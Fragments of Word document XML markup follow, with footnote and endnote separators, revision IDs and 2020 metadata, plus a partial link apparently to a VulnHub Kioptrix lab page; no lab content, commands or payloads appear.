    <w:p w14:paraId="19A59C65" w14:textId="628ECD20" w:rsidR="00EA1399" w:rsidRPr="00EA1399" w:rsidRDefault="00EA1399" w:rsidP="00EA13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6033F9" wp14:editId="4192FF64">
            <wp:extent cx="3060857" cy="2121009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399" w:rsidRPr="00EA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E41EF" w14:textId="77777777" w:rsidR="005C50C3" w:rsidRDefault="005C50C3" w:rsidP="00176BC5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E10D0F1" w14:textId="77777777" w:rsidR="005C50C3" w:rsidRDefault="005C50C3" w:rsidP="0017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278C" w14:textId="77777777" w:rsidR="005C50C3" w:rsidRDefault="005C50C3" w:rsidP="00176BC5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6C10E520" w14:textId="77777777" w:rsidR="005C50C3" w:rsidRDefault="005C50C3" w:rsidP="00176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D1"/>
    <w:rsid w:val="00176BC5"/>
    <w:rsid w:val="00436B9A"/>
    <w:rsid w:val="005C50C3"/>
    <w:rsid w:val="006E7976"/>
    <w:rsid w:val="00B76F8B"/>
    <w:rsid w:val="00DB046A"/>
    <w:rsid w:val="00E535D1"/>
    <w:rsid w:val="00EA1399"/>
    <w:rsid w:val="00E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9A0E8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5C4854F4-2C35-454B-BDE3-42B34948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B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6BC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76B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6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ulnhub.com/entry/kioptrix-level-11-2,23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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-08T03:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-08T07:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>